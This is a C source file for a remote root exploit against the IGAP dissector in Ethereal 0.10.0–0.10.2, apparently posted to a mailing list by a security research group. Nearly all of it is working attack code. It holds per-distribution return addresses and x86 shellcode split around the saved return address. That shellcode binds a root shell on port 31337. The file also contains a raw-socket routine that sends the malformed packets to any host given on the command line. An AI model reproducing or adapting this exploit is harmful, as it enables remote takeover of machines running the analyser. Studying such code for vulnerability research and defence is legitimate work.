/* * THE EYE ON SECURITY RESEARCH GROUP - INDIA * Ethereal IGAP Dissector Message Overflow Remote Root exploit * * Copyright 2004 - EOS-India Group * * Authors note: * Shellcode splitting technique: * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode * requires EBP to contain a usuable stack address, we overwrite saved EBP also. * * Disclaimer: * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot * be held responsible for any damage caused due to misuse of this code. * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to * Ethereal 0.10.2. * * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru] * http://www.eos-india.net * */ #define IPPROTO_IGAP 0x02 // IPPROTO_IGMP=0x02 #define PAYLOAD_SIZE (255-64) #define MAX_BUFF sizeof(struct igap_header)+sizeof(struct ipheader) #define EXP "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit" #define VER "0.2" #define SOCKET_ERROR -1 #define MAX_PACKET 10 #define RETOFFSET 76 #define SRC_IP "" #include <stdio.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <unistd.h> #include <signal.h> #include <netdb.h> #define MAX_ARCH 5 struct eos{ char *arch; unsigned long ret; } targets[] = { "tEthereal(0.10.2)-Gentoo(gdb)", 0xbffede50, //------------------------------- "tEthereal(0.10.2)-Gentoo ", 0xbffede10, //------------------------------- "Ethereal(0.10.2)-Gentoo ", 0xbfffd560, //------------------------------- "tEthereal(0.10.2)-RedHat 8 ", 0xbffedfb8, //------------------------------- "Ethereal(0.10.2)-RedHat 8 ", 0xbfffcd08, //------------------------------- NULL, 0 }; /* x86 linux portbind a shell in port 31337 based on shellcode from www.shellcode.com.ar with a few modifications by us */ char shellcode_firsthalf[]= /* sys_fork() */ "\x31\xc0" // xorl %eax,%eax "\x31\xdb" // xorl %ebx,%ebx "\xb0\x02" // movb $0x2,%al "\xcd\x80" // int $0x80 "\x38\xc3" // cmpl %ebx,%eax "\x74\x05" // je 0x5 /* sys_exit() */ "\x8d\x43\x01" // leal 0x1(%ebx),%eax "\xcd\x80" // int $0x80 /* setuid(0) */ "\x31\xc0" // xorl %eax,%eax "\x31\xdb" // xorl %ebx,%ebx "\xb0\x17" // movb $0x17,%al "\xcd\x80" // int $0x80 /* socket() */ "\x31\xc0" // xorl %eax,%eax "\x89\x45\x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0) "\x40" // incl %eax "\x89\xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1) "\x89\x45\x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1) "\x40" // incl %eax "\x89\x45\x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2) "\x8d\x4d\x08" // leal 0x8(%ebp),%ecx "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 "\x89\x45\x08" // movl %eax,0x8(%ebp) ; char jumpcode[]="\xeb\x10"; char shellcode_secondhalf[]= /* bind()*/ "\x43" // incl %ebx(SYS_BIND = 0x2) "\x66\x89\x5d\x14" // movw %bx,0x14(%ebp)(AF_INET = 0x2) "\x66\xc7\x45\x16\x7a\x69" // movw $0x697a,0x16(%ebp)(port=31337) "\x31\xd2" // xorl %edx,%edx "\x89\x55\x18" // movl %edx,0x18(%ebp) "\x8d\x55\x14" // leal 0x14(%ebp),%edx "\x89\x55\x0c" // movl %edx,0xc(%ebp) "\xc6\x45\x10\x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16) "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* listen() */ "\x40" // incl %eax "\x89\x45\x0c" // movl %eax,0xc(%ebp) "\x43" // incl %ebx "\x43" // incl %ebx(SYS_LISTEN = 0x4) "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* accept() */ "\x43" // incl %ebx "\x89\x45\x0c" // movl %eax,0xc(%ebp) "\x89\x45\x10" // movl %eax,0x10(%ebp) "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 "\x89\xc3" // movl %eax,%ebx /* dup2() */ "\x31\xc9" // xorl %ecx,%ecx "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 "\x41" // incl %ecx "\x80\xf9\x03" // cmpb $0x3,%cl "\x75\xf6" // jne -0xa /* execve() */ "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x52" // pushl %edx "\x53" // pushl %ebx "\x89\xe1" // movl %esp,%ecx "\xb0\x0b" // movb $0xb,%al "\xcd\x80"; // int $0x80 struct ipheader { unsigned char ip_hl:4, ip_v:4; unsigned char ip_tos; unsigned short int ip_len; unsigned short int ip_id; unsigned short int ip_off; unsigned char ip_ttl; unsigned char ip_proto; unsigned short int ip_sum; unsigned int ip_src; unsigned int ip_dst; }; struct igap_header { // This is a malformed header which does not conforms with IGAP RFC unsigned char igap_type; // Message Type unsigned char igap_restime; // Response Time unsigned short int igap_cksum; // IGAP Message Checksum unsigned int igap_gaddr; // Group Address unsigned char igap_ver; // Version unsigned char igap_stype; // SubType unsigned char igap_reserved1; // Reserved unsigned char igap_cid; // Challenge ID unsigned char igap_asize; // Account Size unsigned char igap_msgsize; // Message Size unsigned short int igap_reserved2; // Reserved /* unsigned char igap_uaccount[16];// User Account unsigned char igap_message[64] // Message */ unsigned char igap_payload[16+64+PAYLOAD_SIZE]; // This buffer will contain payload, here we differ from RFC by sending a bigger message. }; unsigned short checksum(unsigned short *buf,int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *(buf)++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void showhelp(char *pr00gie) { int i=0; printf("######### The Eye on Security Research Group - India ########\n"); printf("%s %s\n",EXP,VER); printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n"); printf("http://www.eos-india.net\n\n"); printf("[usage]\n"); printf("%s [Remote Host] [Target]\n",pr00gie); printf("[Available Targets]\n"); while(targets[i].arch != NULL) { printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret); i++; } exit(1); } int main(int argc,char *argv[]) { char buffer[MAX_BUFF]; struct ipheader *iphdr=(struct ipheader*)buffer; struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader)); int sockfd; unsigned long addr; int one=1; int i; const int *val=&one; struct sockaddr_in sin; unsigned long magic; unsigned int n; if(getuid()) { printf("- This code opens SOCK_RAW which needs root privilege\n"); exit(1); } if(argc != 3) showhelp(argv[0]); n=atoi(argv[2]); if(n >= MAX_ARCH) { printf("- Invalid target\n"); showhelp(argv[0]); } magic=targets[n].ret; printf("-Using RET %p\n",magic); addr=inet_addr(argv[1]); if(addr==INADDR_NONE) { printf("- Invalid target\n"); exit(1); } sin.sin_addr.s_addr=addr; sin.sin_family=AF_INET; sin.sin_port=0x00; sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW); if(sockfd==SOCKET_ERROR) { printf("- Failed creating SOCK_RAW descriptor\n"); exit(1); } if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0) printf ("- WARNING !! :Cannot set IP_HDRINCL!\n"); memset(buffer,0x00,MAX_BUFF); // Filling IP Header iphdr->ip_hl=0x05; iphdr->ip_v=0x04; iphdr->ip_tos=0x00; iphdr->ip_len=MAX_BUFF; iphdr->ip_id=htonl(54321); iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset iphdr->ip_ttl=0x01; iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP iphdr->ip_sum=0x00; // Fill sum before sending packet iphdr->ip_src=inet_addr (SRC_IP); iphdr->ip_dst=addr; // Filling IGAP Header igaphdr->igap_type=0x41; // IGAP Membership Query igaphdr->igap_restime=0x0a; // igaphdr->igap_cksum=0x00; // compute before sending packet igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message igaphdr->igap_ver=0x01; // IGAPv1 igaphdr->igap_stype=0x21; // Basic Query igaphdr->igap_reserved1=0x00; // Ignored igaphdr->igap_cid=0x00; // Challenge ID (ignored because Chanllenge Response authentication not used) igaphdr->igap_asize=0x10; // MAX Size of Account Name Field igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message igaphdr->igap_reserved2=0x00; // Reserved // Building exploit buffer //for(i=0;i<16+64+PAYLOAD_SIZE;i++) // memset(igaphdr->igap_payload+i,(unsigned char)i,1); memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE); memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,strlen(shellcode_firsthalf)); memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode)); memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4); magic-=0x10; memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4); memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,shellcode_secondhalf,strlen(shellcode_secondhalf)); // Calculating checksum igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),(sizeof(struct igap_header))>>1); iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1); // Sending one=MAX_PACKET; while(one) { sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin)); printf("."); one--; } close(sockfd); printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]); printf("- Read source to know what to do to check if the exploit worked\n"); return 0; } -- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. 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